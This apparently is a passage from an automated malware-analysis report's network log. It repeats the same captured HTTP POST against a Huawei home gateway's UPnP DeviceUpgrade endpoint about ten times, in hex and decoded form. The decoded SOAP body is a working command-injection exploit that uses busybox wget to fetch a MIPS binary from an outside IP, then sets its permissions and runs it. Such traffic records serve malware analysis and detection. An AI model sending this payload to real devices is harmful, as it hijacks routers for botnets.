4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
